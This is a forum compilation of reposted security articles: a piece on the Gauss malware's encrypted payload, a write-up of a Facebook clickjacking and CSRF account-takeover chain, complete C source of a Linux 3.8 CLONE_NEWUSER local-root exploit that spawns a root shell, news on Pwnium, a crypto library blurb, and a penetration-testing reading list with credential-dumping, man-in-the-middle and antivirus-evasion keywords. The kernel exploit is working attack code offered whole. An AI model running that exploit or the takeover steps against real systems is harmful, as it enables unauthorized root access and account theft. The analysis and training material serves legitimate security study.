Mobile Agents From Malicious Hosts." Researchers from security firm Core Security expanded on the idea eight years later in a paper titled "Foundations and applications for secure triggers." The idea was to use strong cryptography to ensure a piece of code or content remained secret until a particular event occurred. Once the preselected condition was met—and only if it was met—the concealed payload was automatically disclosed or executed. Otherwise it remained locked inside an impenetrable vault. Gauss developers implemented this advanced concept using a surprisingly unsophisticated set of tools. That set includes the relatively archaic RC4 cipher to encrypt three sections of the Gödel module and the cryptographically weak MD5 algorithm to generate the key. Gauss developers likely chose the outdated design because it worked reliably across a broad range of Windows computers thanks to the Microsoft CryptoAPI. Keys unlocking the Gödel payload are generated dynamically based on the settings of one or more computers that were specifically targeted by the attackers. Only the machine or machines containing a specific set of programs and directories will generate the key. To confound people trying to crack the code—and to considerably slow the speed at which they work—Gauss MD5 hashes the configuration data 10,000 times and uses the final output as the key that unlocks the encrypted code. Gödel's mysterious encrypted data is stored in three sections. Kaspersky Lab Specifically, Gauss enumerates the first entry of an infected computer's path environment, which specifies the Windows directories where executable files can be called without specifying their precise location. Gauss then combines that PATH location with the name of the first directory found in the infected computer's Windows Program Files folder. It takes this string and appends a 16-byte hard-coded cryptographic salt value to it and then hashes the new string 10,000 times. It compares the final hash against a hard-coded verification block. If the hash doesn't pass the verification check, Gauss starts the process all over again, this time appending the second entry of the path to the first Program Files folder. The process is repeated until each entry in the path has been appended to each entry in the Program Files. If a hash value passes the verification check, Gauss has located the mysterious PATH and program file that the Gödel module was programmed to find. It then takes that string, appends a new salt value to it, and hashes it 10,000 times. The resulting hash is the RC4 key used to decrypt one of the three encrypted Gödel sections. If the decrypted block passes an additional verification check, Gauss takes the same path and program files string, then appends a different hard-coded salt to decrypt sections two and three. Enlarge / A simplified flow-chart showing Gödel's decryption routine. Eric Bangeman Example of the string pair, second string starting from “~dir” and first salt. Kaspersky Lab Researchers believe the routine was put in place to attack a computer or computers with a specific program installed. One of the checks Gauss performs ensures that the first letter or symbol of the targeted Program Files directory is a special character such as a tilde (~), bracket ({), or comes from Arabic, Hebrew, or another language with an extended character set. Given the detailed logic built into Gödel, it's fair to assume the attackers had cased their intended target for months or years, using another module in Gauss or other espionage trojans altogether. Literally take forever The use of real Windows configuration variables poses some unusual challenges for cryptographers trying to crack the payload. While the number of possible inputs, for instance, could theoretically be 21000 or higher, the actual number is almost certainly far lower since real-world path strings are almost always in human-readable form. (While a password may randomly be generated, path strings typically follow conventions such as "C:\Program Files\Common Files\Microsoft Shared\Windows Live.") Then again, the strings still have the ability to incorporate unique names or even randomly generated values few eyes have ever seen before. The likelihood that the sought-after Program Files folder contains characters from a different language could pose its own obstacles and benefits. While it narrows the possible choices, it may also require crackers to incorporate alphabets bigger than those that include standard English characters. "Password cracking becomes more difficult as the input space grows," Karsten Nohl, a cryptographer with Security Research Labs, told Ars. "The input space for the Gauss unlock password is all names of Windows programs in certain languages, which should be a relatively small space compared to the billions of combinations a password cracker typically tries. However, nobody has a complete list of Windows programs." He continued: "To find the Gauss unlock password, good heuristics are needed that guess Windows program names. Simply brute-forcing the space from '???...' to '???...' is not an option as it would literally take forever." So far, Kaspersky researchers have tried millions of combinations to no avail. In December, they redoubled their efforts by recruiting the creator of the Hashcat password recovery program. That resulted in ocl-GaussCrack, an open-source application that streamlines the cracking of the Gödel module and harnesses the speed of graphics cards to accelerate the process. Typically, GPU crackers can try billions of guesses per second against MD5-derived hashes, but thanks to the design of the encryption routine, GaussCrack can achieve just 489,000 candidate passcodes each second. Posing yet another burden on crackers, the Gauss architects were able to hinder crackers by iterating the hash 10,000 times, a technique often referred to as key stretching. Just as the amassing of hundreds of millions of real-world passwords has fueled recent advances in password cracking, a comprehensive corpus of likely Windows configurations targeted by Gauss is the most likely way to solve the Gödel mystery. Jens Steube, the Hashcat and GaussCrack developer better known as Atom, said he still hasn't settled on the best method for compiling the data. One possibility is to tap into databases already assembled by antivirus companies or other vendors of software that collect the names of programs installed on hundreds of millions of computers. Another possibility, Kaspersky's Raiu said, is to seek help from the National Institute of Standards and Technology or a similar organization. The encrypted payload in the Gödel module is by no means the only mystery surrounding Gauss. Researchers still don't know how the malware takes hold of target computers in the first place or how it spreads from one machine to another. They're also at a loss to explain why Gauss installs a custom font known as "Palida Narrow" and corresponding registry values on infected machines. Analysts have speculated that the font may be used to steganographically fingerprint the author of certain printed materials. Under alternate theories, Palida Narrow, which appears to contain valid Western, Baltic, and Turkish symbols, may provide a simple means for websites to identify infected machines, or even open a font-based vulnerability to exploit. Enlarge Kaspersky Lab Also unexplained is the Round Robin DNS load balancing technique deployed by control servers used to ferry traffic to and from Gauss-infected machines. The setup suggests that the command servers handled massive amounts of traffic, and yet so far, Kaspersky researchers have been able to find just 2,500 computers infected by the malware. The effort Gauss architects expended setting up the load-balancing system indicates that the true number of affected machines could be in the tens of thousands. Still, the biggest mystery connected to Gauss undoubtedly remains the encrypted payload tucked inside its Gödel module. Given the destruction malware creators brought about with Stuxnet, it wouldn't be a stretch if Gauss targeted additional enemy-operated PLCs or an entirely unseen class of equipment in the fledgling annuls of computer warfare. The choice that Gödel be transmitted using USB drives suggests it was targeting "air-gapped" systems so sensitive they weren't connected to the Internet. "It's one of the biggest mysteries of our times and this is a very cool challenge for any security researcher out there who cares about security," Raiu told Ars. "What could we find inside the Gauss payload? PLC code? Zero-days? Code to target unknown systems? Nobody knows for sure and it is probably the incertitude which makes it the most captivating mystery." Thanks to Jeremy Gosney of Stricture Consulting Group, Hashcat developer Jens Steube, and Johns Hopkins University professor Matt Green for their assistance in reporting this story. Story updated to add "reportedly" in first paragraph. Sursa: Puzzle box: The quest to crack the world’s most mysterious malware warhead | Ars Technica

[h=3]UI Redressing against Facebook[/h] In this post, I'm going to discuss a possible attack scenario, targeting the Facebook web application, that could lead to the reset of account passwords in an automated fashion exploiting a UI Redressing issue with the use of a cross-domain extraction technique. [h=3]UI Redressing bug, again[/h] [h=3][/h] During my research, I discovered a Facebook's web resource that is not protected by the X-Frame-Options and that includes the fb_dtsg token, which is adopted as an anti-CSRF token (Figure 1). The following is the affected URL: Selecteaz? limba | Facebook [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 1 - Facebook's web resource vulnerable to UI Redressing attacks.[/TD] [/TR] [/TABLE] The iframe-to-iframe extraction method can be applied here to extract fb_dtsg's value and, consequently, perform a series of Cross-Site Request Forgery attacks against the integrity of the victim's profile data. [h=3][/h] [h=3]The theory behind the Facebook profiles takeover[/h] [h=3][/h] [h=3][/h] Facebook allows users to add a mobile number that, once certified, can be adopted as username in order to login or reset the account's password. Users can insert their mobile numbers via the Account Settings ? Mobile ? Add a phone ? add your phone number options (Figure 2 and Figure 3): a confirmation code is therefore sent by Facebook's system to the user's mobile phone and it must be inserted (Figure 4) to complete the activation process. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 2 - Users can add their mobile number via the "add your phone number here" link.[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 3 - Facebook's form used to add a mobile number.[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 4 - A confirmation code is sent to the user's mobile and must be entered to complete the process.[/TD] [/TR] [/TABLE] The main issue here is that no password is required to associate the mobile number to the user's profile. Because of this, an attacker may abuse the described UI Redressing vulnerability to steal the fb_dtsg token and register an arbitrary phone number. Despite this, the attacker still needs to insert the confirmation code in order to associate his mobile number. A bit of black magic helps here: the attacker can abuse an SMS to mail mobile application to automatically forward the Facebook text-message (SMS) to an attacker-controlled mail box, thus allowing an hypothetical exploit to fetch the code and complete the insertion process. [h=3]The exploit[/h] [h=3][/h] A working Proof of Concept exploit has been developed in order to demonstrate the described attack. We have also shared the code with the Facebook security team. During my experiments, the Android application SMS2Mail has been adopted to forward the Facebook SMS (Figure 5) to the mail box (Figure 6). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 5 - SMS with the Facebook's confirmation code that has been forwarded to the attacker's mail box.[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 6 - Facebook confirmation code forwarded to the attacker's mailbox.[/TD] [/TR] [/TABLE] The following steps summarize the exploitation phases: The exploit frames the vulnerable resource and allows the victim to play a fake game while performing the cross-domain content extraction; The fb_dtsg anti-CSRF token and the victim's user id are extracted. An HTTP request is forwarded to the Facebook application in order to emulate the attacker-controlled mobile number registration; An text-message (SMS), containing the confirmation code, is sent to the attacker mobile device. An SMS2Mail mobile application is installed on attacker's device and automatically forwards the SMS to an attacker-controlled mail box; The exploit waits for the SMS to be forwarded to the mail box, then extracts the confirmation code and performs a second CSRF attack in order to submit the code itself and complete the mobile number registration. The attacker's mobile number is now associated with the victim's profile and can be used to reset the account's password. As a matter of fact, Facebook allows users to enter a previously associated mobile number (Figure 7) which is then used to send a reset code (Figure 8). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 7 - Reset password mechanism involving the user's mobile number .[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 8 - Facebook's form used to insert the resetting code.[/TD] [/TR] [/TABLE] A fully automated Proof of Concept exploit can be downloaded here, while the following video illustrates the described attack: Posted by Luca De Fulgentis Tuesday, March 19, 2013 Sursa: Nibble Security: UI Redressing against Facebook

[h=2]GNU/Linux kernel(3.8+)Privilege Escalation Vulnerability[/h] #define _GNU_SOURCE #include <sched.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/wait.h> int go[2]; char child_stack[1<<20]; extern char **environ; void die(const char *msg) { perror(msg); exit(errno); } int child(void *arg) { char c; close(go[1]); read(go[0], &c, 1); setuid(0); if (chdir("chroot") < 0) die("[-] chdir"); if (chroot(".") < 0) die("[-] chroot"); return 0; } int setup_chroot(const char *me) { mkdir("chroot", 0755); mkdir("chroot/lib64", 0755); mkdir("chroot/bin", 0755); if (link(me, "chroot/lib64/ld-linux-x86-64.so.2") < 0) die("[-] link"); if (link("/bin/su", "chroot/bin/su") < 0) die("[-] link"); return 0; } int main(int argc, char *argv[]) { char *su[] = {"/bin/su", NULL}; char *sh[] = {"/bin/bash", NULL}; char me[256], *mee[] = {me, "1", NULL}; char uidmap[128], map_file[128]; pid_t pid; struct stat st; int fd; if (geteuid() == 0 && argc == 1) { printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid()); chown("lib64/ld-linux-x86-64.so.2", 0, 0); chmod("lib64/ld-linux-x86-64.so.2", 04755); exit(0); } else if (geteuid() == 0) { /* this will run outside */ setuid(0); execve(*sh, sh, environ); die("[-] execve"); } printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n"); memset(me, 0, sizeof(me)); readlink("/proc/self/exe", me, sizeof(me) - 1); printf("[+] Found myself: '%s'\n", me); if (fork() > 0) { printf(" [*] Parent waiting for boomsh to appear ...\n"); for ( { stat(me, &st); if (st.st_uid == 0) break; usleep(1000); } execve(me, mee, environ); die("[-] execve"); } printf(" [*] Setting up chroot ...\n"); setup_chroot(me); printf("[+] Done.\n [*] Cloning evil child ...\n"); if (pipe(go) < 0) die("[-] pipe"); pid = clone(child, child_stack + sizeof(child_stack), CLONE_NEWUSER|CLONE_FS|SIGCHLD, NULL); if (pid == -1) die("[-] clone"); printf("[+] Done.\n [*] Creating UID mapping ...\n"); snprintf(map_file, sizeof(map_file), "/proc/%d/uid_map", pid); if ((fd = open(map_file, O_RDWR)) < 0) die("[-] open"); snprintf(uidmap, sizeof(uidmap), "0 %d 1\n", getuid()); if (write(fd, uidmap, strlen(uidmap)) < 0) die("[-] write"); close(fd); printf("[+] Done.\n"); close(go[0]); write(go[1], "X", 1); waitpid(pid, NULL, 0); execve(*su, su, NULL); die("[-] execve"); return -1; } Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Am redeschis topicul deoarece, desi se abereaza mult, e un subiect important: cum vedem noi hackerii, cine sunt si ce fac ei. In plus, subiectul principal, acest documentar, face o oarecare lumina in unele situatii, chiar daca pe alocuri abereaza. E o tara libera si fiecare are dreptul sa isi exprime opinia si sa ii respecte sau nu pe cei care dau interviuri.

Da, nici de pe nist.gov nu merg, sunt aceleasi, probabil sterse de Google. E interesanta asta: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2013-0913) , kernel 3.8. Iar cealalta, ceva mai multe detalii: http://www.scip.ch/en/?vuldb.8021

[h=1]Google Chrome OS Linux WAS Exploited at Pwnium 2013 for $40,000[/h]By Sean Michael Kerner | March 18, 2013 From the 'Linux Kernel Exploit' files: Earlier this month, Google Chrome running Chrome OS (Linux!) was hailed as being a survivor in the Pwnium/Pwn2own event that hacked IE, Firefox and Chrome browsers on Windows. Apple's Safari running on Mac OS X was not hacked and neither (apparently) was Chrome on Chrome OS. Google disclosed this morning that Chrome on Chrome OS had in fact been exploited - albeit, unreliably. The same researcher that took Google's money last year for exploiting Chrome, known publicly only as 'PinkiePie' was awarded $40,000 for exploiting Chrome/Chrome OS via a Linux kernel bug, config file error and a video parsing flaw. Google has already fixed the flaws in ChromeOS 25.0.1364.173, BUT seeing as this is a Linux kernel flaw, i'm very curious if this affect any/all other Linux distros. As is typical for Google, they offer very little in the way of full-disclosure or detail on the flaw fixed. All that Google publicly has posted now is: [181083] High CVE-2013-0915: Overflow in the GPU process. Credit to Pinkie Pie. [chromium-os:39733] High CVE-2013-0913: Time-of-Check/Time-of-Use and counting overflows in i915 driver. Credit to Pinkie Pie. Neither of those issues is specifically identified as a 'Linux kernel' issue. Google has also not publicly opened up those CVE's so it's not possible to see the exact bug (which possibly could be with the kernel). As Google is a responsible firm, I'd suspect/hope that the bug has been submitted upstream, though right now it's not superclear to me where that is.. In any event, it's a chained bug and not something that was a reliable exploit, but still...would/will be good to see it eliminated from the mainline Linux kernel sooner rather than later. Sursa: Google Chrome OS Linux WAS Exploited at Pwnium 2013 for $40,000 - InternetNews.

[h=1]Stanford Javascript Crypto Library[/h] The Stanford Javascript Crypto Library (hosted here on GitHub) is a project by the Stanford Computer Security Lab to build a secure, powerful, fast, small, easy-to-use, cross-browser library for cryptography in Javascript. SJCL is easy to use: simply run sjcl.encrypt("password", "data") to encrypt data, or sjcl.decrypt("password", "encrypted-data") to decrypt it. For users with more complex security requirements, there is a much more powerful API, described in the documentation and illustrated in this demo page. SJCL is small but powerful. The minified version of the library is under 6.4KB compressed, and yet it posts impressive speed results. (TODO: put up a benchmarks page.) SJCL is secure. It uses the industry-standard AES algorithm at 128, 192 or 256 bits; the SHA256 hash function; the HMAC authentication code; the PBKDF2 password strengthener; and the CCM and OCB authenticated-encryption modes. Just as importantly, the default parameters are sensible: SJCL strengthens your passwords by a factor of 1000 and salts them to protect against rainbow tables, and it authenticates every message it sends to prevent it from being modified. We believe that SJCL provides the best security which is practically available in Javascript. (Unforunately, this is not as great as in desktop applications because it is not feasible to completely protect against code injection, malicious servers and side-channel attacks.) SJCL is cross-browser. We hope. We've tested it on all the install browsers on the security lab computers (including various versions of Internet Explorer, Chrome, Firefox, Safari and Opera on Mac, Linux and Windows) and on the rhino engine, but still need to do more comprehensive testing. We have a test page up on this site; if it reports any failures, please report an issue. SJCL is open. You can use, modify and redistribute it under a BSD license or under the GNU GPL, version 2.0 or higher. SJCL supports primarily symmetric-key cryptography, but there's an experimental branch with elliptic curve support (ECDH public key encryption and ECDSA signatures). SJCL was written by Emily Stark, Mike Hamburg and Dan Boneh at Stanford University. Special thanks to Aldo Cortesi and Roy Nicholson for reporting bugs in earlier versions of SJCL. A whitepaper on SJCL (also by Emily Stark, Mike Hamburg and Dan Boneh) was published in the 2009 Annual Computer Security Applications Conference. Sursa: Stanford Javascript Crypto Library

Resources for Aspiring Penetration Testers Scott Sutherland March 11, 2013 At some point, all penetration testers get asked, “Where did you learn all this stuff?” In my experience, the question often comes from clients and students interested in pen testing. Usually, they’re asking because they aren’t sure where to start. There are a number of two- and four-year college programs that can provide a nice structured approach, but generally I think penetration testing is like any other skillset; if you find the right resources, a good direction, and study hard, you’ll acquire the skills you’re looking for. However, I will say that it does help to already have a strong IT background. Regardless of the path taken, it’s nice to have some decent resources along the way. In this blog, I’ve put together a list of books and online training resources that cover topics and skills that I’ve found useful as a penetration tester. Hopefully the list is also useful to those of you interested in getting your feet wet. Have fun and Hack Responsibly! Recommended Books Read, read, and read some more. Recommending that people “Read the F***ing Manual” (RTMF) is just as important today as it was 20 years ago. The list below is really directed at specific tasks that most penetration testers have to perform. I’m aware that there are some obvious gaps in the list, but I haven’t found any books that I really love related to privilege escalation, network attacks, AV evasion, or penetration testing as a profession. Regardless, I hope you enjoy the books as much as I have. Web Application Hacker’s Handbook 2nd Edition Every penetration tester should have a copy of this book. It has good coverage on a lot of web application attack methods with an emphasis on Burp Suite, which a very robust local HTTP proxy. SQL Injection Attack and Defense This book is very complimentary to the Web Application Hacker’s Hand Book. It provides a pretty straightforward approach for identifying and exploiting SQL injection flaws on common database platforms. As a side note, I also recommend playing with Burp Suite and SQLMap while learning how to perform SQL injection attacks. Web Application Obfuscation This book is also complimentary to the Web Application Hacker’s Hand Book and SQL Injection Attack and Defense. It provides a decent overview of techniques that can be used to essentially hide your attacks from web application firewalls, intrusion prevention systems, and web application input filters. Database Hacker’s Handbook This is an oldie but a goody. It provides some great coverage on how to attack the common database platforms. This can come in handy if you’re hoping to escalate your privileges on the database level after finding an SQL injection issue. Managed Code Rootkits This book provides manual and automated methods for reverse engineering managed code applications and frameworks. It covers the .NET framework, Java RTE., and Dalvik applications. I thought it was interesting because it has a large focus on actually poisoning the frameworks instead of the application directly. However, it should be noted that this book does not focus on advanced debugging techniques like most reversing books. A Guide to Kernel Exploitation: Attacking the Core Not all penetration testers spend their days developing kernel exploits, but it’s still good to know the basics. This book has a focus on understanding kernel exploits and how they actually expose operating system vulnerabilities. So far, it’s been a good read, but I haven’t finished it yet. Someone also recently recommended The Shellcoder’s Handbook to me. So consider that as well. Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software I liked this one a lot. It provides a good assembly primer which can come in handy in a lot of ways during a penetration test. It also provides decent coverage in areas that you would expect like static and dynamic malware analysis, file structures, test handlers, packers, and debugging. I’ve also heard that the IDA PRO Book is great if you want to become the reversing master of the universe. However, I don’t actually own it at the moment. Gray Hat Python I really like this book as well. It’s a quick read and it does a good job of describing different debugging, injection, and fuzzing techniques. It also provides a lot of sample code that can be used to perform tasks like hooking and DLL/code injection. I’ve found both techniques to be quite handy for avoiding anti-virus solutions and stealing data protected with encryption. Windows® Internals, Part 1 / Part 2: Covering Windows Server® 2008 R2 and Windows 7 I will most likely never finish either of these books in their entirety. However, they do make great references. If you ever need to know anything about how any part of Windows works, these are the go-to books. Network exploration and security auditing cookbook Nmap has become one of the fundamental “tools of the trade” over the past decade or so. In my opinion, it’s as valuable to administrators as it is to attackers. I think that every IT professional should know what Nmap is and how to use it. This book is a great start for someone who has not been exposed to it in the past. It covers everything from basic system discovery to writing your own plugins to scan for vulnerabilities. MetaSploit: A Penetration Tester’s Guide MetaSploit has also become one of the fundamental “tools of the trade” in recent years. There is a lot of community involvement and I think this is a good book for beginners who want to learn more about MetaSploit and some practical use cases. Free Online Training and Vulnerable VMs Obviously, there are ton of great blogs, training sites, and vulnerable VMs/application out there. I will not be coving all of them. However, I’ve tried to include online resources that are valuable for beginners and veterans alike. SecurityTube SecurityTube is like YouTube, but the videos are dedicated to teaching penetration test skills. Our intern actually recommended this site to me before I knew what it was. Since that time, I’ve been checking every time I start learning a new topic just to see if they have already covered it. I feel the quality of the tutorials is great and obviously recommend it. Irongeek It’s not a pretty site, but it provides a lot of good content. It is also known for releasing video presentations from security conferences is record time. MetaSploit Unleashed This web site provides a free online course all about MetaSploit. They do ask for donations to fund Hackers for Charity which raises funds for underprivileged children in East Africa. It’s a great site with a great cause – I recommend checking it out. VulnHub Reading only gets you so far. Most people in IT are hands on learners so, in order to get your hands dirty, I recommend checking out VulnHub. This is a relatively new site that supplies virtual machines that are designed to be vulnerable. For those of you looking for a quick way to set up a testing lab at home, this may be the most cost/time affective solution. Bug bounties If you feel you have the skills that can now pay the bills, there are lots of companies willing to pay real money if you find a big issue in their product. Below is a site dedicated to consolidating a list of the companies currently paying “bug bounties”. Good Google Searches As I mentioned earlier, I haven’t been able to find books that cover everything I’d like them to. Where books fail, Google usually succeeds. I suggest using it to find good archived presentations from security conferences such as Defcon, Blackhat, Derby con etc. Below I’ve also provided some topics that you might find interesting. Windows Penetration and Escalation In my experience, 90% of enterprise environments are Windows-based operating systems that centralized access control around Active Directory Services. Therefore, it’s good to have an understanding of the tools and techniques used to escalate privileges in those environments. Unfortunately, I have yet to find a single book that covers well; below are some basic keywords, vulnerability categories, and tools to get you started. Default passwords Clear text passwords Excessive privileges: Users, services, gui, files, registry, memory Insecure local and remote services Insecure schedule tasks Local and remote exploits Password guessing: medusa, hydra, bruter, and MetaSploit Password and hash dumping: Cain, lsa secrets, credential manager, fgdump, mimikatz, MetaSploit post modules Password hash cracking: john the ripper, hashcat, lophtcrack, masking, Cain Impersonating users: incognito, mimikatz, pass the hash, MetaSploit psexec, shared accounts, smbexec Linux Penetration and Escalation Even though Linux and UNIX systems aren’t in the majority on most networks, they still have a role to play and so, naturally, it’s good to understand their soft spots as well. For the most part, Linux has many of the same basic keywords and vulnerability categories as Windows: Default passwords Clear text passwords Excessive privileges: Users, services, gui, files, memory, setuid, orphan files, world writable files, sudoers configurations Insecure local and remote services Insecure schedule tasks Local and remote exploits Password guessing: medusa, hydra, bruter, and MetaSploit Password and hash dumping Password hash cracking: john the ripper, hashcat, masking Man in the Middle (MITM) Attacks For some of you, MITM attacks may be a new concept so here is brief description. If a workstation is communicating with a server, and you are routing traffic between them, then you are the MITM. It’s a great position to be in for monitoring and manipulating traffic. There are lots of ways to acquire a MITM position using a range of protocol attacks. To get you started, I’ve provided a list of 10 protocols and tools for attacking systems on a LAN. Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycreds NetBIOS Name Service (NBNS): MetaSploit and responder Link-local Multicast Name Resolution (LLMNR): MetaSploit and responder Pre-Execution Environment (PXE): MetaSploit Dynamic Trunking Protocol (DTP): Yersinia Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia plugin) Hot Stand-by Router Protocol (HSRP): Yersinia Dynamic Host Configuration Protocol (DHCP): Interceptor, MetaSploit, manual setup Domain Name Services (DNS): MetaSploit, ettercap, dsniff, zodiac, ADMIdPack VLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig Anti-Virus Evasion Anti-virus evasion is often a requirement during penetration testing. I personally break down AV evasion approaches into the four buckets below. I provided a list of keywords for each category to get your searches started. I’m also planning to release a few blogs down the line that will provide more options and actual examples. Bypass Weak AV Configurations Uninstall anti-virus, disable services, terminate processes, disabled via the GUI, create an exception policy for all .exe files, or execute from external media. Source Code Manipulation Remove comments, randomize function and variable names, encode or encrypt content, delay execution of malicious code, use alternative functions, or insert superfluous functions that change execution flow. Binary Manipulation Bind with white listed applications, pack or compress, modify strings, modify resources, modify imports table, modify assembly to do things mentioned in source code manipulation. Common packers: upx, iexpress, and mpress. Process Manipulation Inject malicious code or DLLs into local or remote process. Native languages can do it directly or through a managed code framework like .net. Powershell is a popular example that the MetaSploit team (amongst others) has been using a lot lately. Also, process manipulation is commonly done with python code that is converted to a portable executable. Sursa: Resources for Aspiring Penetration Testers | NetSPI Blog